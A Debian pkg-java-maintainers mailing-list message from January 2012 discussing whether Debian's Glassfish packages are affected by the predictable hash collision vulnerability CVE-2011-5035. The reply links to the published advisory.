Bug#653964: glassfish predictable hash collisions

Moritz Muehlenhoff jmm at inutil.org
Mon Jan 2 18:24:05 UTC 2012


On Mon, Jan 02, 2012 at 09:56:20AM +0100, Torsten Werner wrote:
> Hi,
> 
> On Sun, Jan 1, 2012 at 11:53 PM, Thijs Kinkhorst <thijs at debian.org> wrote:
> > It was reported that Glassfish is affected by the predictable hash collisions
> > attack that made its rounds around the net this week. This is tracked at
> > http://security-tracker.debian.org/tracker/CVE-2011-5035
> 
> I do not think that we are vulnerable because Debian does not ship a
> full glassfish stack. We build some core libs only.
> 
> > Can you ensure that fixed packages are uploaded to sid as soon as possible,
> > and assert whether a fix for lenny and squeeze would be necessary?
> 
> I do not even understand how to reproduce the issue. May you elaborate
> on that, please?

The advisory can be found here: http://www.nruns.com/_downloads/advisory28122011.pdf

I'm not sure where to find "Oracle security ticket S0104869", though.

Cheers,
         Moritz





More information about the pkg-java-maintainers mailing list